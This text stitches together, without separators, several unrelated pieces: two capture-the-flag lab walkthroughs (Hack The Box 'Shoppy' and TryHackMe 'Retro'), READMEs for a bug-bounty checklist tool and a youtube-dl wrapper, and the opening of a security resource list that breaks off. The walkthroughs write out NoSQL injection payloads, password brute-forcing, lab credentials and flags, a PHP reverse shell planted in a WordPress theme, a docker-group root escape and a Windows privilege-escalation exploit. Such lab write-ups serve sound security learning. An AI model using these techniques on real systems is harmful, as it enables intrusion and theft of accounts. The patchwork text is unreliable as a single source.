### IP `10.10.11.180` # Recon ### nmap `nmap -sC -sV 10.10.11.180 -oN init.nmap` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-02 01:59 EST Nmap scan report for 10.10.11.180 Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.23.1 |_http-server-header: nginx/1.23.1 |_http-title: Did not follow redirect to http://shoppy.htb Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.47 seconds ``` * Browsing to the website redirects us to `shoppy.htb`, so we can add that to /etc/hosts ### gobuster * First, we want to try some directory bruteforcing: `gobuster dir -u shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o init.dirs` ``` =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://shoppy.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.3 [+] Timeout: 10s =============================================================== 2022/12/02 02:02:41 Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 179] [--> /images/] /login (Status: 200) [Size: 1074] /admin (Status: 302) [Size: 28] [--> /login] /assets (Status: 301) [Size: 179] [--> /assets/] /css (Status: 301) [Size: 173] [--> /css/] /Login (Status: 200) [Size: 1074] /js (Status: 301) [Size: 171] [--> /js/] /fonts (Status: 301) [Size: 177] [--> /fonts/] /Admin (Status: 302) [Size: 28] [--> /login] /exports (Status: 301) [Size: 181] [--> /exports/] /LogIn (Status: 200) [Size: 1074] /LOGIN (Status: 200) [Size: 1074] ``` * Here we can see a status code of 200 for the `/login` page * Second, we want to try some subdomain bruteforcng: `gobuster vhost -u http://shoppy.htb -w /usr/share/wordlists/seclists/Discovery/DNS/combined_subdomains.txt --append-domain -t 200` ``` =============================================================== Gobuster v3.3 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://shoppy.htb [+] Method: GET [+] Threads: 500 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/combined_subdomains.txt [+] User Agent: gobuster/3.3 [+] Timeout: 10s [+] Append Domain: true =============================================================== 2022/12/02 18:12:13 Starting gobuster in VHOST enumeration mode =============================================================== Found: mattermost.shoppy.htb Status: 200 [Size: 3122] =============================================================== 2022/12/02 18:16:22 Finished =============================================================== ``` * We can see the mattermost subdomain here, so we can add it to `/etc/hosts` # Exploitation * To check for vulnerabilities in the login page, I want to first fuzz the input with special characters * To do this, we want to get the login request with burp and save it as `login.req` with the GET parameters changed to "FUZZ" * Then we can use the following command to check for characters with outputs that stand out * `ffuf -request login.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc al` Unfortunately this didn't work ### NoSQLi * Trying a basic SQL injection with `' OR 1=1--` makes the page hang and eventually return a 504, which makes me think there could be a vulnerability there * Sqlmap doesn't return anything of use, so I thought I'd look for NoSQL vulns * There are tools for doing this automatically, but ffuf can also be used to fuzz common injection techniques: `ffuf -u http://shoppy.htb/login -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -request login.req` ``` :: Method : POST :: URL : http://shoppy.htb/login :: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/Databases/NoSQL.txt :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 :: Header : Accept-Language: en-US,en;q=0.5 :: Header : Accept-Encoding: gzip, deflate :: Header : Origin: http://shoppy.htb :: Header : Referer: http://shoppy.htb/login :: Header : Host: shoppy.htb :: Header : Connection: close :: Header : Upgrade-Insecure-Requests: 1 :: Header : Content-Type: application/x-www-form-urlencoded :: Data : username=FUZZ&password=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403 ________________________________________________ { $ne: 1 } [Status: 302, Size: 102, Words: 5, Lines: 1] ' || 'a'=='a [Status: 302, Size: 102, Words: 5, Lines: 1] db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 [Status: 302, Size: 102, Words: 5, Lines: 1] {"$gt": ""} [Status: 302, Size: 102, Words: 5, Lines: 1] {$nin: [""]}} [Status: 302, Size: 102, Words: 5, Lines: 1] || 1==1 [Status: 302, Size: 102, Words: 5, Lines: 1] db.injection.insert({success:1}); [Status: 302, Size: 102, Words: 5, Lines: 1] :: Progress: [22/22] :: Job [1/1] :: 1 req/sec :: Duration: [0:00:20] :: Errors: 14 :: ``` * Trying out the payloads, the following one works: * `admin' || 'a'=='a` * This confirms that we have a NoSQL injection vulnerability * We can then put the same payload into the `search` bar and it gives us a `export-search.json` file with the following contents: ```json [{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}] ``` ### Password Cracking We can try to crack these hashes. I put them into [crackstation](https://crackstation.net/) and we found out that they are md5 hashes. We got one set of credentials: `josh:remembermethisway` These credentials didn't work for ssh, but did work on the mattermost subdomain. ### Mattermost In the mattermost app, we can log in and loko at a locked channel called `Deploy Machine` This reveals credentials for an account: `jaeger:Sh0ppyBest@pp!` We can ssh with these creds. This gets us the user flag: `288a0f17204d7f4179a7fcd43025338d` # Privilege Escalation Running `sudo -l` shows that jaeger can run `/home/deploy/password-manager` as the `deploy` When we run `sudo -u deploy ./password-manager`, we can see that it is taking in a password. Let's reverse engineer the binary. I downloaded the binary by doing `cat password-manager | base64 -w` and then echoing the output: `base64 <stuff> | base64 -d > password-manager` This is a quick-and-dirty way to get the binary on our computer. ### Reverse Engineering Luckily, reversing this binary was not necessary. We can run `rabin2 -z password-manager` to see all data sections in the binary: ``` [Strings] nth paddr vaddr len size section type string ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― 0 0x00002010 0x00002010 33 34 .rodata ascii Welcome to Josh password manager! 1 0x00002038 0x00002038 35 36 .rodata ascii Please enter your master password: 2 0x0000205d 0x0000205d 6 14 .rodata utf16le Sample 3 0x00002070 0x00002070 31 32 .rodata ascii Access granted! Here is creds ! 4 0x00002090 0x00002090 26 27 .rodata ascii cat /home/deploy/creds.txt 5 0x000020b0 0x000020b0 47 48 .rodata ascii Access denied! This incident will be reported ! ``` One of the strings was `"Sample"`. Luckily, this ended up being the password. This allows us to get the credentials: ``` Welcome to Josh password manager! Please enter your master password: Sample Access granted! Here is creds ! Deploy Creds : username: deploy password: Deploying@pp! ``` We are now the `deploy` user With this, we can cat out the source: ```cpp #include <iostream> #include <string> int main() { std::cout << "Welcome to Josh password manager!" << std::endl; std::cout << "Please enter your master password: "; std::string password; std::cin >> password; std::string master_password = ""; master_password += "S"; master_password += "a"; master_password += "m"; master_password += "p"; master_password += "l"; master_password += "e"; if (password.compare(master_password) == 0) { std::cout << "Access granted! Here is creds !" << std::endl; system("cat /home/deploy/creds.txt"); return 0; } else { std::cout << "Access denied! This incident will be reported !" << std::endl; return 1; } ``` Looks like breaking up the string stopped `strings` from working, but didn't really make it much harder. ### Docker Running `id` shows us that the `deploy` user is in the docker group. As a result, we can mount the root directory and log in as root. I used this [gtfobins](https://gtfobins.github.io/gtfobins/docker/) command: ```bash docker run -v /:/mnt --rm -it alpine chroot /mnt sh ``` This lets us become root and cat the root flag: `531fe1dc4092160a85c06bda6163964d`
# bugbounty_checklist <img src="./doc_images/BClist.png" alt="logo" width="340" height="270"/><br> This tool may help you to have a good methodology for bug bounty hunting this tool based on [Bug Bounty Checklist for Web App](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md#Single_domain) <br> This tool is organized and allows you to deal with a wide range of domains and subdomain <br> You can now add your methodology or use your friend methodology just by copying or creating the methodology file in `./methodologys` <br><br> ### NOTE : this version is beta if you have any problem feel free to inform us ## requirement * [PyQt5](https://pypi.org/project/PyQt5/) : * `pip3 install PyQt5` * [python3](https://www.python.org/downloads/) * [sqlite3](https://docs.python.org/2/library/sqlite3.html) ## demo [![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/fc5h5Lg24g8/0.jpg)](https://www.youtube.com/watch?v=fc5h5Lg24g8) ## methodology file syntax ``` #syntax of the confige file #tab_name:<title>Title_text #tab_name:task_text #note evry task under a title will belong to that title #example of title --> Recon:<title>Information Gathering #example of task--> Recon:enumerate subdomain with subfinder #Always try to arrange tasks in "taps" from largest to smallest in terms of number of tasks ``` ## usage This tool is Easy to handle , i made a shortcuts to be more faster ![image tutorial](./doc_images/tutorial.png) - **1** : - Add domain - `Ctrl+A` - **2** : - Delete - `Del` - **3** : - Add subdomain - `Ctrl+Alt+A` - **4** : - Edite - `Ctrl+M` - **5** : - Open check list of current domain - `Ctrl+E` - **Save the changes** : - `Ctrl+S` - **Cancel** : - `Ech` ## Some notes if you want to use the white theme mode just set the value of `Activ_white_mode` to `True` <br> this tool doesn't support multiple of windows yet
#NOTICE <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> Updated youtube-dl to 2017.07.23</td> </tr> <td> This project has some issues,so is delayed </td> </tr> <tr> <td> Cleaning will take place soon </td> </tr> <tr> <td> a well documented html is in progress</td> </tr> <tr> <td> The next major version will be 0.2 soon,which will have new feature and exception handling</td> </tr> </table> #Purpose <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> Want to embed youtube-dl,this is some of the ways I do it.</td> </tr> <td> Extend youtube-dl basic functions in python to be more flexible </td> </tr> <tr> <td> Call youtube-dl or youtube_dl_embed via java </td> </tr> <tr> <td> Call youtube-dl or youtube_dl_embed via c,c++ </td> </tr> <tr> <td> Call youtube-dl or youtube_dl_embed via PHP </td> </tr> </table> #MEMBERS <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> siddht 4/1/3 </td> <td> project maintainer,developer </td> <td> FULL ACCESS</td> </tr> <tr> <td> yan12125 </td> <td> youtube-dl -> project collaborator </td> <td> FULL ACCESS </td> </tr> <tr> </tr> </table> #BUILD <table width="100%" alitmgn="center" class="table_border_both"> <tr class="heading_table_top"> <td> rg3:youtube-dl </td> <td> TRAVIS CI </td> <td> Build Status</td> <td><img src="https://travis-ci.org/rg3/youtube-dl.svg?branch=master" alt="youtube-dl build status"></td> </tr> <tr> <td> siddht1:youtube-dl (fork) </td> <td> TRAVIS CI </td> <td> Build Status</td> <td><img src="https://travis-ci.org/siddht1/youtube-dl.svg?branch=master" alt="youtube-dl build status"></td> </tr> <tr> <td> youtube-dl-embed project </td> <td> TRAVIS CI </td> <td> Build Status</td> <td><img src="https://travis-ci.org/siddht4/youtube_dl_embed.svg?branch=master" alt="youtube-dl-embedd build status"></td> </tr> <td> youtube-dl-embed project </td> <td> Coverity Scan </td> <td> Coverity Scan Status</td> <td><a href="https://scan.coverity.com/projects/siddht4-youtube_dl_embed"> <img alt="Coverity Scan Build Status" src="https://scan.coverity.com/projects/13144/badge.svg"/> </a> </td> </tr> <tr> <td> youtube-dl-embed project </td> <td> dependencies</td> <td> Dependencies Status</td> <td><img src="https://img.shields.io/david/expressjs/express.svg" alt="youtube-dl-embed dependencies"></td> </tr> <tr> <td> youtube-dl-embed project </td> <td> License</td> <td> UNLICENSE</td> <td><img src="https://img.shields.io/badge/license-UNLICENSE-green.svg" alt="youtube-dl-embed UNLICENSE LICENSE"></td> </tr> </table> #Thanks <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> @yan12125 </td> <td> Thanks aka Yen Chi Hsuan (youtube-dl contributor/maintainer) for your help to extend this utility </td> </tr> <td> @iriberri </td> <td> Thanks aka Carla Iriberri (Travis Builder) for helping me fixing the builds for TRAVIS CI </td> </tr> <tr> </tr> </table> #VERSION <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> youtube-dl </td> <td> 2017.07.23</td> </tr> <td> in youttube-dl [folder] </td> <td> in __main__.py [python file] </td> </tr> <tr> </tr> </table> #TRAVIS CI <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> Built against</td> </tr> <td> python</td> </tr> <tr> <td> </td> </tr> </table> # 1.py (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/1.py) - It starts to download the video mentioned in _url_,with ydl_opts as the parameter. - It will create a json file a.json which gets re written every time,you can use it to create a custom logger and display it as realtime progress - The json is also printed in the terminal and cleared every time,so that you can see the realtime progress - It will send a custom notification at 80 percent progress so that you can prepare the code,at 100 % or finished,a notification of 'file download ' will appear to notify you that the file has been downloaded How it works :- First run this file via terminal by typing "python 1.py" Based on _url_ (python type list) it will start download Code part : _url_=[''] # undeclared list ,you can add your own url #_url_.append('') # append to list _url_ ,you can add more url to the existing list,remove # _len=len(_url_) For _url=[] ,this is a python type list , (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/1.py#L60) Here you can declare all your url example : _url=['url1','url2'] and so one #_url_.append('') is commented,so to also run it uncomment it. Whatever you provide here will be appended to _url example : _url=['url1','url2'] _url.append('url3') will make _url=['url1','url2','url3'] At 80 % code part : (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/1.py#L39-L49) _str=str(d['_percent_str']) _strr=_str.replace("%", "") _float=float(_strr) if _float==80: os.system('notify-send '+_str) You will see the notification 80% This will also appear for 90%,99% and 100 % or completed # 2.py (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/2.py) - It provides with meta data of a video/audio # 3.py (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/3.py) This is a mere upgradation of 1.py so that one can simply enter a text file which has all the url. How this works :- First run this file via terminal by typing "python 3.py" : A message will appear " Enter the text file : " : Enter the file name,be sure to also provide the file format.example: 1.txt : From here everything is similar to what you see in 1.py This is quite similar to "youtube-dl -a [text_file]" #Next 1 aka 5.py - Add a script which will start a new download as soon as the status reaches 95 % - This way the time taken to convert the video,start a new download can be avoided example _url_=['a','b','c'] _process=0 _len=len(_url_) It starts with _url_[0],_process=1,so as soon it reaches 95 %, _url_[1] is started, _process=2 as _url_[0] will soon finish, As soon as _url[0] completes that thread will end As soon as _url_[1] reaches 95 % the same things occurs and a process is again started which starts _url_[2],_process=3 As soon as _url_[1] completes and this thread is stopped, As soon as _url_[2] reaches 95 %,the invoker will stop as _process+=1 will make it 4 and _len=3,so the entire process will terminate as _url_[2] completes This is a form of looping,while loop to be exact,but has to handled #NEXt 3 aka 4.py - Parallel downloading from two url. - Evenly divides url list into two lists Sample code : sample.py #Usage -Make sure you have the source of youtube-dl,source: (https://github.com/rg3/youtube-dl) -Alternatively if you don`t have the source,but have a excutable copy as mentioned in (https://github.com/rg3/youtube-dl/#installation) then simply copy the exectuable to your current folder,this will work for linux versions only,windows user will have to get the source. Example: - sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl - sudo chmod a+rx /usr/local/bin/youtube-dl These commands were the one you already did,then once run "sudo youtube-dl -U" to update to the latest then get your current path, perform these steps - cp /usr/local/bin/youtube-dl /[your_current_path] rename youtube-dl to youtube-dl.zip -unzip youtube-dl.zip -d /[the_folder_you_want] As soon as you unzip,naviagate to the folder which has youtube-dl, or with the new structure in place simply clone this repository terminal command "git clone https://github.com/siddht4/youtube_dl_embed" the directory will look like ----list--of---youtube-dl---------- youtube_dl [folder] __main__.py [main youtube-dl loader file] youtube_dl_embed [folder] ---end--of---youtube-dl---- ,as these will directly invoke __main__.py then added any url inside _url_=[''] residing in 1.py or 2.py to run 3.py just provide a file as you did for "youtube-dl -a [file_name]" then naviagte to youtube_dl_embed folder and in terminal type "python 1.py" -you must have got a json file "a.json",these stores your current progress realtime. Usage: (https://github.com/siddht3/table_json_creator) -you must have got a notification,when the download reached 80%,90%,99% and when completed - you can now modify the code however you want #USAGE - JAVA If you would instead try the java one,then you would be using (https://github.com/siddht4/youtube_dl_embed/blob/master/java/main.java) as a base. Requirments :- - python to run youtube-dl,youtube_dl_embed - java to run main.java How to do :- - Make sure you have java installed - copy /java/main.java to where would you like - make necessary changes to (https://github.com/siddht4/youtube_dl_embed/blob/master/java/main.java#L11) - run in terminal "javac main.java", this would create main.class,which is a class file,your main.java is compiled - Now run "java main" to get the ouput from the compiled class file Structure :- JAVA --> exec ---> python ----> youtube-dl youtube-dl -> python -> exec --> JAVA #USAGE - C If you would instead try the C one,then you would be using (https://github.com/siddht4/youtube_dl_embed/blob/master/c/1.c) as a base. Requirments :- - python to run youtube-dl,youtube_dl_embed - c,I have used gcc,to test and built it How to do :- - Make sure you have c installed,if you are using linux make sure gcc is installed - copy /c/1.c to where would you like - make necessary changes to (https://github.com/siddht4/youtube_dl_embed/blob/master/c/1.c) - open terminal type the command as follows "gcc 1.c",this will compile 1.cc and create a.out file - now in terminal type "./a.out [any_command]",for this once instead,try "./a.out youtube-dl -v" Structure :- C --> std [in] ---> python ----> youtube-dl youtube-dl --> python --> std [out] -- > C #USAGE - C++ If you would instead try the C++ one,then you would be using (https://github.com/siddht4/youtube_dl_embed/blob/master/c++/link.cpp) as a base. Requirments :- - python to run youtube-dl,youtube_dl_embed - c++,I have used g++,to test and built it How to do :- - Make sure you have c++ installed,if you are using linux make sure g++ is installed - copy /c++/link.cpp to where would you like - copy (https://github.com/siddht4/youtube_dl_embed/blob/master/c%2B%2B/pstream.h),this the psteam.h file/header to execute stdin and stdout for C++,this file opens streams to outside packages - make necessary changes to (https://github.com/siddht4/youtube_dl_embed/blob/master/c%2B%2B/link.cpp) especially (https://github.com/siddht4/youtube_dl_embed/blob/master/c%2B%2B/link.cpp#L8) changes needed to be made in 'proc("ls", redi::pstreams::pstdout | redi::pstreams::pstderr)' to something like proc '("youtube-dl -v ", redi::pstreams::pstdout | redi::pstreams::pstderr)'' so make necessary changes after 'proc("'' line only - then open terminal type the command as follows "g++ link.cpp",this will compile link.cpp and create a.out file - now in terminal type "./a.out ", to see your ouput based on '("youtube-dl -v ", redi::pstreams::pstdout | redi::pstreams::pstderr)'' Structure :- C++ --> pstream ---> python ----> youtube-dl youtube-dl --> python --> pstream -- > C++ #USAGE - PHP If you would instead try the PHP one,then you would be using (https://github.com/siddht4/youtube_dl_embed/blob/master/php/test.php) as a base. NOTE :- - I am currently final testing PHP one so that a - form with video url is given which is posted using POST method,lets name it form.php - a php which will sanitize data received via POST i.e URL,this will call exec function which will then execute youtube-dl,so meanwhile a table will be created which uses json sample at (https://github.com/siddht3/table_json_creator) which will show realtime log to user. - As soon as it reaches 100 % or completed user will be redirtected to the downloaded link Requirments :- - python to run youtube-dl,youtube_dl_embed - php 7.0 - nginx (PHP CGI) or Apache server . How to do :- - Make sure you have nginx,php installed and nginx configured to run PHP via FASTCGI - copy /php/test.php to where would you like - For testing purpose I am calling (https://github.com/siddht4/youtube_dl_embed/blob/master/python_embed/2.py) as it provides me with the metadata You can repurpose it in anyway you would,especially $cmd '<?php $cmd="python ../python_embed/test_2.py"; $out=shell_exec($cmd); var_dump($out); ?> ' Structure :- PHP --> FAST CGI --> NGINX --> PYTHON --> youtube-dl youtube-dl --> PYTHON --> NGINX --> FAST CGI --> PHP #Other-Works <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> Project Name </td> <td> Purpose </td> <td> Info </td> </tr> <tr> <td> youtube_dl_java (https://github.com/siddht1/youtube_dl_java_old)</td> <td> using youtube-dl via java i.e youtube-dl-java -> jvm -> python -> youtube-dl </td> <td> This project has been merged and is under sub directory java (https://github.com/siddht4/youtube_dl_embed/tree/master/java) </td> <td> </td> </tr> <tr> <td> () </td> <td> using youtube-dl via c and c++ </td> <td> - currently testing their behaviour </td> <td> This project has been merged and is under sub directory C and C++ likewise (https://github.com/siddht4/youtube_dl_embed/tree/master/c) (https://github.com/siddht4/youtube_dl_embed/tree/master/c++)</td> </tr> </table> #UNLICENSE (https://github.com/rg3/youtube-dl/blob/master/LICENSE) <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> As youtube-dl is under unlicense, So these mere utilily as an extension is also provided as same as it also directly follows youtube-dl as base</td> </tr> <tr> </tr> </table> #CHANGES <table width="100%" align="center" class="table_border_both"> <tr class="heading_table_top"> <td> To accompany futher works like integration of the script with php,java,c,c++ the required folder structure is done</td> </tr> <tr> </tr> </table> #TODO -Clean this readme file -Push the php code,it will be under php_dashboard -Push 4.py i.e double downloading i.e parallel 2 process of youtube-dl -Push 5.py i.e serial downlading from two url At 95% of the first process (process #1),process #2 will begin the next download of the URL found in '_url_ ' list. As soon as the first process reaches 100 %,this process will exit and only process #2 will be present. As process #2 reaches 95 %,process #3 (rebirth of process #1) will start the next download of the URL in the link and the chain follows. So to say even process is always #2,odd process is always process #1 in ideal situation Some cases :- Case 1: Synopsis '_url_=['a','b','c','d','e','f']' a is 95 MB,b is 10 mb,c is 100 mb ,d is 1 GB ,e is 10 MB,f is 20 MB As a i.e process #1 reaches 95 % i.e 90.25 MB process #2 will start b, process #1 will terminate after reaching 100 % and completing the file Currently two process process are running #1,#2 As process #2 reaches 95 % i.e 9.5 MB process #3 will start c Currently three process are running process #1,#2,#3 Sooner or later #1,#2 reaches 100 % and both process exists So if I instead used the earlier design of 5.py - it would had process #1 had started - at 95 % ,process #2 would have started - process #1 reaching 100% and finishing would start c - meanwhile process #2 would have also ended as the file size is small - so we see process #2 also starting c,if this happens c would surely get corrupted alongside both process reaching deadlock, so if anycase process #1 and process #2 would call the url, both will overwrite the same file. Means to break this :- -Implementing process kill or termination - Breaking the list of '_url_' to two smaller list,chances are the same would happen too
# Retro ![image](https://user-images.githubusercontent.com/5285547/131119489-6feda4b6-44b3-41aa-b3fa-bcb22ece0b84.png) Room link: https://tryhackme.com/room/retro Room IP: 10.10.22.148 *\* for me your's will be different* ## Enumeration * Nmap ``` PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server ``` * -sCV ``` PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RETROWEB | NetBIOS_Domain_Name: RETROWEB | NetBIOS_Computer_Name: RETROWEB | DNS_Domain_Name: RetroWeb | DNS_Computer_Name: RetroWeb | Product_Version: 10.0.14393 |_ System_Time: 2021-08-27T11:32:23+00:00 | ssl-cert: Subject: commonName=RetroWeb | Issuer: commonName=RetroWeb | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-08-26T11:19:26 | Not valid after: 2022-02-25T11:19:26 | MD5: 9269 09a9 b05b 293f 4a56 f70c 66b0 c167 |_SHA-1: 1c04 1ffc e75d 5f9f f772 12eb 5fcc c808 1b53 a3ed |_ssl-date: 2021-08-27T11:32:23+00:00; +1s from scanner time. ``` --- * ffuf ``` ffuf -u http://10.10.22.148/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -mc all -fc 404 retro [Status: 301, Size: 149, Words: 9, Lines: 2] ``` Scanning the directories shows /retro endpoint --- * Port 80 http://10.10.22.148/retro The page shows us lots of posts from a guy called Wade about classic gaming. I noticed the site urls are simular to how wordpress are laid out. There is a login link at the bottom that resolves to a wordpress login. This confirms my suspicion, time to get wp-scan out. ``` wpscan --url http://10.10.22.148/retro/ Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29 [i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) ``` We can see this is an IIS server (as confirmed in the nmap scan) and wade is the user. Let's try to brute his login for wordpress using wpscan ``` wpscan --url http://10.10.22.148/retro/ -U wade -P /usr/share/wordlists/rockyou.txt ``` While leaving the wpscan running, I checked out the web app further, where i noticed a strange comment. ![image](https://user-images.githubusercontent.com/5285547/131134191-2fcbcebe-f271-4dd7-bbf4-7959c58dff63.png) --- * Reverse shell After logging into the admin portal, I first checked to see if I could edit a theme template, which I could. Editing the 404.php page with a php reverse shell (windows version: https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/php_reverse_shell.php) we can get a shell. Call after editing. ``` http://10.10.22.148/retro/wp-content/themes/90s-retro/404.php ``` whoami? ![image](https://user-images.githubusercontent.com/5285547/131135864-c7d8b488-9f84-4237-85a1-a83c8b194b01.png) --- ## User Looking around the system I first check the wp-config.php file for any passwords. ``` // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress567'); /** MySQL database username */ define('DB_USER', 'wordpressuser567'); /** MySQL database password */ define('DB_PASSWORD', 'YSPgW[%C.mQE'); /** MySQL hostname */ define('DB_HOST', 'localhost'); ``` Not finding much else I remmebered we have another open port 3389. Info on port 3389: Time to test the creds we have for wade. ``` xfreerdp /u:[domain\]<username> /p:<password> /v:<IP> ``` We're in! ![image](https://user-images.githubusercontent.com/5285547/131137667-ad9fef1c-4974-44e2-82bc-9ac48fb2d0d2.png) ## Root After getting the user flag, I noticed the recycle bin had something in, I dragged this to the desktop and seen a file called. ```hhupd.exe``` Gooling the file lead to this article: https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege We can check out the certificate and due to some misconfigurations on the way the UI handles opening a link, we effectivly run as system. Run the app and click the show more information link. ![image](https://user-images.githubusercontent.com/5285547/131138533-435cc689-7421-4399-bf6c-0b082b6eafc9.png) Then click on Issued by: VeriSign hyperlink to then open IE browser. Now choose save as and open a new UI (as system), ![image](https://user-images.githubusercontent.com/5285547/131138585-4550c94c-f265-4d3d-996c-3aa7a0bad387.png) This failed for me, so I had to look for another way around ![image](https://user-images.githubusercontent.com/5285547/131140375-94acf104-cbd6-47e7-ae9d-309ee9bce9a1.png) After more enumeration I found the system is vunerable to the exploit: https://github.com/jas502n/CVE-2019-1388 Copying the exploit to the box and running it gives us admin instantly. ![image](https://user-images.githubusercontent.com/5285547/131141091-7462ac52-71e4-4576-8d5c-f07b30fc468e.png) That's the end of the box. Thanks for reading!
## CSec A comprehensive collection of all things [Computer Security.](https://en.wikipedia.org/wiki/Computer_security) Collection of awesome software, libraries, documents, books, resources and cool stuff about security. ## Table of Contents - [Computer Security](#CSec) - [Network](#network) - [Web](#web) - [Operating Systems](#operating-systems) - [Bug Bounty](#bug-bounty) - [Beginner Resources](#beginner-resources) - [Bug Bounty Tools](#bug-bounty-tools) - [Bug Bounty Cheatsheet](#bug-bounty-cheatsheet) - [Bug Bounty Writeups](#bug-bounty-writeups) - [Burp Suite](#burp-suite) - [Burp Suite Payloads](#burp-suite-payloads) - [EBooks](#ebooks) - [HTTP Status Codes](#http-status-codes) - [Test your hacking skills](#test-your-hacking-skills) - [Vulnerability Databases And Resources](#vulnerability-databases-and-resources) - [Other Awesome Lists](#other-awesome-lists) - [Contributing](#contributing) ### Bug Bounty **What is bug bounty?** Identification and reporting of bugs and vulnerabilities in a responsible way. **What to study?** - Internet, HTTP, TCP/IP - Networking - Command line - Linux - Web technologies, javascript, php, java - Atleast 1 prog language (Python/C/JAVA/Ruby..) **Choose your path (Important)** - Web pentesting - Mobile pentesting - Desktop apps **Resources** *Web* - Web app hackers handbook - Web hacking 101 - Hacker's playbook 1,2,3 - Hacking art of exploitation - Mastering modern web pen testing - OWASP Testing guide *Mobile* - Mobile application hacker's handbooks **Youtube channels** *Hacking* - Live Overflow - Hackersploit - Bugcrowd - Hak5 - Hackerone *Programming* - thenewboston - codeacademy **Writeups, Articles, blogs** - Medium (infosec writeups) - Hackerone public reports - owasp.org - Portswigger - Reddit (Netsec) - DEFCON conference videos - Forums **Practice (Important)** - Burpsuite - nmap - dirbuster - sublist3r - Netcat **Testing labs** - DVWA - bWAPP - Vulnhub - Metasploitable - CTF365 - Hack the box #### Start *Select a platform* - Hackerone - Bugcrowd - Open bug bounty - Zerocopter - Antihack - Synack (private) *Choose wisely (first not for bounty)* - Select a bug for hunt - Exhaustive search - Not straightforward always **REPORT:** - Create a descriptive report - Follow responsible disclosure - Create POC and steps to reproduce **Words of wisdom** - PATIENCE IS THE KEY, takes years to master, don't fall for overnight success - Do not expect someone will spoon feed you everything. - Confidence - Not always for bounty - Learn a lot - Won't find at the beginning, don't lose hope - Stay focused - Depend on yourself - Stay updated with infosec world ### Beginner Resources - [How to Become a Successful Bug Bounty Hunter](https://hackerone.com/blog/what-great-hackers-share) - [Researcher Resources - How to become a Bug Bounty Hunter](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102) - [Bug Bounties 101](https://whitton.io/articles/bug-bounties-101-getting-started/) - [The life of a bug bounty hunter](http://www.alphr.com/features/378577/q-a-the-life-of-a-bug-bounty-hunter) - [Awsome list of bugbounty cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) - [Getting Started - Bug Bounty Hunter Methodology](https://www.bugcrowd.com/blog/getting-started-bug-bounty-hunter-methodology) ### Bug Bounty Cheatsheet [A collection of recon workflow and details about Bug Bounty tools/cheatsheet](ihttps://docs.google.com/spreadsheets/u/0/d/1TxNrvaIMRS_dmupcwjwJmXtaFk_lPGE1LzgxPu_7KqA/htmlview#) ### Bug Bounty Writeups [List of bug bounty writeups](https://pentester.land/list-of-bug-bounty-writeups.html) ### Bug Bounty Tools **How to get started with Bug Bounty** 